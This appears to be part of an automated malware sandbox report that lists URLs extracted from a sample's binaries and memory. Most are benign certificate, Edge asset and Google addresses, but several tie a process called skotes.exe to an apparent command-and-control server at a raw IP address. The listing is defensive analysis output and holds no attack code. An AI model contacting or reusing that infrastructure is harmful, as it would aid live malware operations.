Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpV
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpW
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded;
Source: skotes.exe, 00000017.00000002.3293696158.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phph
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpk
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedh
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpq
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/lfons
Source: skotes.exe, 00000017.00000002.3293696158.0000000000B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ows
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_474.4.dr	String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2580964214.000000006C6BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2580653028.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2567638542.000000001D144000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: FCFBAKJD.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_476.4.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_476.4.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: Reporting and NEL.9.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingcsp
Source: chromecache_474.4.dr, chromecache_476.4.dr	String found in binary or memory: https://apis.google.com
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://assets.msn.cn/resolver/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://assets.msn.com/resolver/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, JKEGHDGHCGHDHJKFBFBK.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, JKEGHDGHCGHDHJKFBFBK.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL.9.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://c.msn.com/
Source: FCFBAKJD.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp, KKEHIEBK.0.dr, FCFBAKJD.0.dr, Web Data.8.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp, KKEHIEBK.0.dr, FCFBAKJD.0.dr, Web Data.8.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 4bb3cbda-4223-42eb-9166-e2269eaddeda.tmp.9.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json.8.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 4bb3cbda-4223-42eb-9166-e2269eaddeda.tmp.9.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: chromecache_476.4.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_476.4.dr	String found in binary or memory: https://content.googleapis.com
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, JKEGHDGHCGHDHJKFBFBK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2571406052.00000000232A2000.00000004.00000020.00020000.00000000.sdmp, JKEGHDGHCGHDHJKFBFBK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Reporting and NEL.9.dr	String found in binary or memory: https://deff.nelreports.net/api/report
Source: 2cc80dabc69f58b6_0.8.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: Reporting and NEL.9.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
Source: manifest.json.8.dr	String found in binary or memory: https://docs.google.com/
Source: chromecache_476.4.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: manifest.json.8.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json.8.dr	String found in binary or memory: https://drive.google.com/
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp, KKEHIEBK.0.dr, FCFBAKJD.0.dr, Web Data.8.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: KKEHIEBK.0.dr, FCFBAKJD.0.dr, Web Data.8.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2546281725.000000000063B000.00000004.00000020.00020000.00000000.sdmp, KKEHIEBK.0.dr, FCFBAKJD.0.dr, Web Data.8.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log6.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log6.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log6.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log7.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr, HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log6.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr, HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: eae353be-bbb9-4735-8190-c35eb5c4a76a.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
